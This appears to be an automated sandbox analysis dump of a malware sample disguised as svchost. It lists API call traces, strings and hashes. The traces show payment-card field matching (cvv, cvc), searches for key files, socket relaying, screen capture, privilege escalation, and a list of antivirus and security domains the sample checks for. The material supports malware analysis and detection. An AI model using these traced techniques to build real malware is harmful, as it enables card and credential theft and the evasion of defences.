                                                                                                                                                                                                                • Part of subcall function 0264D970: wsprintfA.USER32 ref: 0264D9F2
                                                                                                                                                                                                                • Part of subcall function 0264D970: wsprintfA.USER32 ref: 0264D9FF
                                                                                                                                                                                                                • Part of subcall function 0264D970: wsprintfA.USER32 ref: 0264DA0C
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,0268F5A0), ref: 0264DA6A
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0264DA83
                                                                                                                                                                                                                • Part of subcall function 02649020: SetThreadDesktop.USER32(?,76F8F590,76F816B0,?), ref: 0264902F
                                                                                                                                                                                                                • Part of subcall function 02649020: GetDC.USER32(00000000), ref: 02649037
                                                                                                                                                                                                                • Part of subcall function 02649020: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02649048
                                                                                                                                                                                                                • Part of subcall function 02649020: GetDeviceCaps.GDI32(00000000,00000008), ref: 02649059
                                                                                                                                                                                                                • Part of subcall function 02649020: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02649070
                                                                                                                                                                                                                • Part of subcall function 02649020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 026490B2
                                                                                                                                                                                                                • Part of subcall function 02649020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 026490C2
                                                                                                                                                                                                                • Part of subcall function 02649020: DeleteObject.GDI32(00000000), ref: 026490C5
                                                                                                                                                                                                                • Part of subcall function 02649020: ReleaseDC.USER32(00000000,00000000), ref: 026490CE
                                                                                                                                                                                                                • Part of subcall function 02649020: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02649129
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,0268F54C), ref: 0264DAB0
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0264DAC3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,0268F670), ref: 0264DAE1
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0264DAFF
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 0264DB20
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(0268F670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 0264DB3D
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 0264DB47
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0264DB61
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,0268F630), ref: 0264DB79
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 0264DB97
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000000,?), ref: 0264DBB8
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(0268F630,00000006,00000010,00000000,00000000,00000000,00000000), ref: 0264DBD5
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0264DBDF
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0264DBFD
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0264DC10
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0264DC23
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,0268F5DC), ref: 0264DC39
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentThread.KERNEL32 ref: 02665940
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 02665947
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentProcess.KERNEL32(00000020,02654D1B,?,?,?,?,02654D1B,?,?,00000000), ref: 02665957
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 0266595E
                                                                                                                                                                                                                • Part of subcall function 02665930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02665981
                                                                                                                                                                                                                • Part of subcall function 02665930: AdjustTokenPrivileges.KERNELBASE(02654D1B,00000000,00000001,00000000,00000000,00000000), ref: 0266599B
                                                                                                                                                                                                                • Part of subcall function 02665930: GetLastError.KERNEL32 ref: 026659A5
                                                                                                                                                                                                                • Part of subcall function 02665930: CloseHandle.KERNEL32(02654D1B), ref: 026659B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$Security$Descriptor$wsprintf$EventFile$FreeMutexThreadToken$BitsCapsConvertCurrentDeviceHeapInfoLocalMappingNamedOpenProcessSaclStringView$AdjustBitmapCloseCompatibleComputerCountDeleteDesktopErrorHandleLastLookupNameObjectPrivilegePrivilegesReleaseTickValuelstrlen
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 3555772620-820036962
                                                                                                                                                                                                              • Opcode ID: f9c4a99f08fc3f10bc6f2bb8d88a7023e025781ee64e438bb6ffbde84442493f
                                                                                                                                                                                                              • Instruction ID: 36cbea358f2e01ef7e69d43f12077b6dc1f7cf0e3673286093dd9facc293ed3a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9c4a99f08fc3f10bc6f2bb8d88a7023e025781ee64e438bb6ffbde84442493f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D517EB0FC0305BAF720AFA59C46FAD77A8AB44F00F504615B601BA2C0DBF0A5508FA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,76F8F380,00000000,00000001,00000000,?,?,?,02658A44,?,?,?,?,?), ref: 0265E433
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02658A44,?,?,?,?,?,?), ref: 0265E441
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02658A44,?,?,?,?,?,?), ref: 0265E44D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02658A44,?,?,?,?,?,?), ref: 0265E45B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02658A44,?,?,?,?,?,?), ref: 0265E467
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02658A44,?,?,?,?,?,?), ref: 0265E479
                                                                                                                                                                                                              • strstr.MSVCRT ref: 0265E48F
                                                                                                                                                                                                              • strstr.MSVCRT ref: 0265E4A2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 0265E50B
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0265E512
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265E522
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265E580,00000000,00000000,00000000), ref: 0265E548
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265E560
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265E571
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                              • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                              • API String ID: 1632825432-2817208116
                                                                                                                                                                                                              • Opcode ID: c9b7352e2bcda20077d46148d0de5726069fd37acc71a740e41d00df430746d7
                                                                                                                                                                                                              • Instruction ID: 8684538aa706bf18823abab653bf40da5d82fe13cb3312f503d14c04adb9f0cf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9b7352e2bcda20077d46148d0de5726069fd37acc71a740e41d00df430746d7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D414632A407216BEB220E786CA9FAE37994F45785F698310EC4197341FF77DB1182A9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02659B39
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02659B42
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02659B4C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02659B4F
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 02659B75
                                                                                                                                                                                                              • send.WS2_32(?,02689E4C,00000002,00000000), ref: 02659BCC
                                                                                                                                                                                                              • send.WS2_32(?,0268E1CC,00000002,00000000), ref: 02659BF2
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 02659C18
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000000), ref: 02659C92
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000005), ref: 02659CC7
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 02659D0D
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 02659D24
                                                                                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 02659D37
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 02659D47
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02659D5A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000005), ref: 02659D67
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02659D6E
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 02659D7A
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 02659D9C
                                                                                                                                                                                                              • send.WS2_32(?,?,0000000A,00000000), ref: 02659DB6
                                                                                                                                                                                                              • send.WS2_32(?,?,0000000A,00000000), ref: 02659DD0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02659970,?,00000000,00000000), ref: 02659DEA
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 02659CBC
                                                                                                                                                                                                                • Part of subcall function 026598F0: shutdown.WS2_32(?,00000001), ref: 0265990B
                                                                                                                                                                                                                • Part of subcall function 026598F0: shutdown.WS2_32(026599EC,00000001), ref: 02659910
                                                                                                                                                                                                                • Part of subcall function 026598F0: recv.WS2_32(026599EC,?,00000400,00000000), ref: 0265992F
                                                                                                                                                                                                                • Part of subcall function 026598F0: recv.WS2_32(?,?,00000400,00000000), ref: 02659945
                                                                                                                                                                                                                • Part of subcall function 026598F0: closesocket.WS2_32(?), ref: 02659959
                                                                                                                                                                                                                • Part of subcall function 026598F0: closesocket.WS2_32(026599EC), ref: 0265995C
                                                                                                                                                                                                                • Part of subcall function 026598F0: ExitThread.KERNEL32 ref: 02659960
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02659DFC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$Heap$send$Process$AllocThreadclosesocketshutdown$CloseCreateExitFreeHandleconnectgethostbynamehtonsinet_ntoasocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 699211285-0
                                                                                                                                                                                                              • Opcode ID: 28a1fc3abd639524262c92bb58386f3da51de9fbb3628ad90a729b2ad7cb0b69
                                                                                                                                                                                                              • Instruction ID: 769f16d4c44d3e18dd0e1865805ce0313802cee3d377b130414e443ef4f50dec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28a1fc3abd639524262c92bb58386f3da51de9fbb3628ad90a729b2ad7cb0b69
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE91A1B1645350BEE320EB748C85F6F7BD9AB84704F446E1CFA82962C1D774E444CBA6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,avast.com,?,?,0264626C), ref: 0264611B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kaspersky,?,?,0264626C), ref: 0264612B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,drweb,?,?,0264626C), ref: 02646137
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,eset.com,?,?,0264626C), ref: 02646143
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,antivir,?,?,0264626C), ref: 0264614F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,avira,?,?,0264626C), ref: 0264615B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,virustotal,?,?,0264626C), ref: 02646167
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,virusinfo,?,?,0264626C), ref: 02646173
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,z-oleg.com,?,?,0264626C), ref: 0264617F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,trendsecure,?,?,0264626C), ref: 0264618B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,anti-malware,?,?,0264626C), ref: 02646197
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,.comodo.com,?,?,0264626C), ref: 026461A3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                              • API String ID: 0-375433535
                                                                                                                                                                                                              • Opcode ID: 1b7709a6bb653b6aa229eaa4e7866aad0ab581b647d9d8fd3258e6ee3349c33a
                                                                                                                                                                                                              • Instruction ID: c645ad95be6d4f30cbe1c8cf6226eddadd4d37e240217f698e9bd8a6797d35f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b7709a6bb653b6aa229eaa4e7866aad0ab581b647d9d8fd3258e6ee3349c33a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1016763BC2B5629FB21717ECC95F5F768C5D8BC883820720F946E6206EB86C10B04A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,0264148C,00000000,?), ref: 0264101B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,76F8F570,?,0264148C,00000000,?), ref: 0264103E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,0264148C,00000000,?), ref: 02641045
                                                                                                                                                                                                              • memset.MSVCRT ref: 02641055
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,76F8F570,?,0264148C,00000000,?), ref: 02641073
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,0264148C,00000000,?), ref: 02641093
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02660810,00000000,00000000,00000000), ref: 026410B9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,\secrets.key,?,0264148C,00000000,?), ref: 026410D5
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026620D0,00000000,00000000,00000000), ref: 026410E5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,sign.key,?,0264148C,00000000,?), ref: 026410FD
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02662BB0,00000000,00000000,00000000), ref: 02641116
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,0264148C,00000000,?), ref: 0264112A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,0264148C,00000000,?), ref: 0264113B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,0264148C,00000000,?), ref: 02641150
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0264148C,00000000,?), ref: 02641153
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,0264148C,00000000,?), ref: 0264115F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0264148C,00000000,?), ref: 02641162
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                              • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                              • API String ID: 3254303593-2345338882
                                                                                                                                                                                                              • Opcode ID: 6abe087d97a223597390a70a31bfd03d84be76dd3fa9cfeaef54d7fdff9c011b
                                                                                                                                                                                                              • Instruction ID: 113539cb28c5db193e1a82d183ddf69d815360b99df4bd13312bf1ef84278f95
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6abe087d97a223597390a70a31bfd03d84be76dd3fa9cfeaef54d7fdff9c011b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F441E3315802957BE7316B669C8CDBF3F3CEAC7F64B514658F85AA3240DF218881C6B5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,?,76A8DB30), ref: 00403060
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                              • String ID: cmd.exe
                                                                                                                                                                                                              • API String ID: 2839743307-723907552
                                                                                                                                                                                                              • Opcode ID: c83219c8b1fcc2364968f814fc3d8ceb50f78c4147f13553458a25b82dac8a32
                                                                                                                                                                                                              • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c83219c8b1fcc2364968f814fc3d8ceb50f78c4147f13553458a25b82dac8a32
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A5C5,?,753CBF00), ref: 026610F0
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,753CBF00), ref: 02661131
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,753CBF00), ref: 0266113B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02661143
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02661154
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,753CBF00), ref: 0266115B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,753CBF00), ref: 0266119A
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,753CBF00), ref: 026611A7
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,753CBF00), ref: 026611F0
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,753CBF00), ref: 0266120C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104,?,753CBF00), ref: 02661229
                                                                                                                                                                                                                • Part of subcall function 02669780: GetProcessHeap.KERNEL32(00000008,00004070,76F90F00,00000000,76F92F00,?,02653CE8,?), ref: 02669793
                                                                                                                                                                                                                • Part of subcall function 02669780: HeapAlloc.KERNEL32(00000000,?,02653CE8,?), ref: 02669796
                                                                                                                                                                                                                • Part of subcall function 02669780: memset.MSVCRT ref: 026697AB
                                                                                                                                                                                                                • Part of subcall function 02669780: CreateFileA.KERNEL32(02653CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,02653CE8,?), ref: 02669802
                                                                                                                                                                                                                • Part of subcall function 02669780: GetProcessHeap.KERNEL32(00000000,00000000,?,02653CE8,?), ref: 02669825
                                                                                                                                                                                                                • Part of subcall function 02669780: HeapValidate.KERNEL32(00000000,?,02653CE8,?), ref: 02669828
                                                                                                                                                                                                                • Part of subcall function 02669780: GetProcessHeap.KERNEL32(00000000,00000000,?,02653CE8,?), ref: 02669834
                                                                                                                                                                                                                • Part of subcall function 02669780: HeapFree.KERNEL32(00000000,?,02653CE8,?), ref: 02669837
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,753CBF00), ref: 02661258
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A5C5,?,753CBF00), ref: 02661277
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,?,753CBF00), ref: 026612DB
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,753CBF00), ref: 026612E8
                                                                                                                                                                                                                • Part of subcall function 02669910: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,76F92F00), ref: 02669991
                                                                                                                                                                                                                • Part of subcall function 02669910: _snprintf.MSVCRT ref: 026699AD
                                                                                                                                                                                                                • Part of subcall function 02669910: FindFirstFileA.KERNEL32(00000000,?), ref: 026699BC
                                                                                                                                                                                                                • Part of subcall function 02669910: LocalFree.KERNEL32(00000000), ref: 026699C9
                                                                                                                                                                                                                • Part of subcall function 02669910: wsprintfA.USER32 ref: 02669A08
                                                                                                                                                                                                                • Part of subcall function 02669910: wsprintfA.USER32 ref: 02669A16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                              • String ID: 8A99A5C5$\$inter.zip$path.txt
                                                                                                                                                                                                              • API String ID: 3082343898-2690403882
                                                                                                                                                                                                              • Opcode ID: 85f549f1571df7b23d106abf3ac692a843b13948665703a6ab04631f46d427eb
                                                                                                                                                                                                              • Instruction ID: 0c2cd0435fbb9024229cca2d66bc745998e73d9244e6cc2f74c3060f238d8c87
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85f549f1571df7b23d106abf3ac692a843b13948665703a6ab04631f46d427eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 756104709402496FDB25CB249C9CBFABBE8AF46300F5446D4E9CAD7340DF709A88CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277,?,?,00000000), ref: 02662920
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 02662961
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 0266296B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02662973
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02662984
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0266298B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 026629BF
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,00000000), ref: 026629CC
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 02662A10
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,?,00000000), ref: 02662A2C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02662A49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
